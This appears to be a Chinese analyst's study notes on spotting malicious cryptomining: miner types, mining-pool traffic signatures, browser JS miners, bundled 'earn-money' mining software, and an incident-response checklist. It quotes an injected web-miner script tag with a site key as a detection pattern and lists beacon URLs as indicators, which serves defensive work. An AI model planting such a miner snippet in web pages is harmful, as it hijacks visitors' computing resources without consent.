学习链接：

https://www.freebuf.com/column/189455.html（已经总结的很全，读了很多遍，受益良多）

下面开始我的学习总结：

当前恶意挖矿程序主要的形态分为三种：

- （1）自开发的恶意挖矿程序，其内嵌了挖矿相关功能代码，并通常附带有其他的病毒、木马恶意行为

- （2）利用开源的挖矿代码编译实现，并通过PowerShell，Shell脚本或Downloader程序加载执行，如XMRig [7], CNRig [8]，XMR-Stak[9]。

以上两类可被恶意利用也可能被合法利用？有些不懂？且听我细细道来。

-（3） Javascript脚本挖矿，其主要是基于CoinHive[6]项目调用其提供的JS脚本接口实现挖矿功能。https://www.anquanke.com/post/id/100422

挖矿流量细分：

常规TCP挖矿通信（1、2）

相关截图：

流量特征有明显特征，参考：https://github.com/Miner1305/xmrig-proxy/blob/bae9edcf350b5e036642915ac632fe420db74a26/doc/STRATUM.md

2、web挖矿

参考链接：https://www.anquanke.com/post/id/98636（是谁悄悄偷走我的电）

常见溯源方式：网站被挂恶意js，浏览器访问过程进行挖矿，找的过程和找黑链差不多，需要找到被挂挖矿js的代码挂在哪里？（不是客户的我一般就不找了）

检测方式：设备检测客户访问的界面包含以下代码即可：

<script src="https://t.cn/EvlonFh"></script><script>OMINEId("e02cf4ce91284dab9bc3fc4cc2a65e28","-1")等

此种情况多为用户访问进行挖矿，但也遇到过可能web入侵被挂挖矿js的场景，以下为需要js的过程：调试，网络，找js加载过程。

3、“正常软件挖矿”

案例1-哈鱼一键挖矿

api.ihashfish.com，参考链接：https://news.mydrivers.com/1/593/593314.htm、https://www.hostloc.com/thread-471894-1-1.html

流量特征：

api.ihashfish.com:18081/api/v2/balance?mid=ph%5fr1R2EVmARUpweRo%3d&worker=e008e93052f68ec42b7e41852db07367&versionCode=1401095&ch=hashfish&syslang=zh-CN&sysgeo=45&lang=zh&t=2957469740

api.ihashfish.com:18081/api/v2/rate/report?coin=xmr&rate=1899.0&mid=ph%5fr1R2EVmARUpweRo%3d&worker=6a8bbbf98bfebd1c868cb59d94705cf0&versionCode=1501101&dn=159&ch=hashfish&syslang=zh-CN&sysgeo=45&lang=zh&t=2155576027

api.ihashfish.com:18081/api/v2/popwnd?mid=ph%5fr1R2EVmARUpweRo%3d&worker=4dbb75c8cf3d55aac9b79ffc671da0a9&versionCode=1501101&ch=hashfish&sysver=6.1&dn=147&quittime=7264707&minetime=0&showpoptime=1583742073&starthelptime=7264707&syslang=zh-CN&sysgeo=45&lang=zh&t=646737959

案例二：共享赚宝

流量特征如1TCP一样，参考链接：https://www.eastredm.com/

这是真实遇到过的产生挖矿告警，确认真的是挖矿，流量上定位到域名，VT找到样本名称共享赚宝，天擎直接找到并查杀：

https://www.virustotal.com/gui/file/e5c37d8d386a4fae4c630e3c6bc7ae2cce1465b1115cdf0caf90f78470c0ea95/behavior/Tencent%20HABO

总结：也是我的想法：设备上产生挖矿告警怎么办？

1、确认告警准确性，怎么触发的告警阶段，什么挖矿类型？（流量上确认还是威胁情报还是检测出的js-web挖矿）

2、以上能确认的话，就需要上机，上机之前尽量能确认安全设备能解决的问题就别上机？（找到攻击者、入侵方式、挖矿开始时间等，安全设备能找到的就别再机器上找，不是不能找，而是难道安全设备就检测出来一个点？）

3、找不到的话就需要上机，主机侧我比较弱，一般威胁情报能定性的话直接找历史的情报上级查杀样本、进程、除计划任务、启动项、修补漏洞即可，如果没有安全产品找到原因的话，那只能上机找了，但是最终的结果还是查杀样本、进程、删除计划任务、启动项、找到并修补漏洞，又转回去了。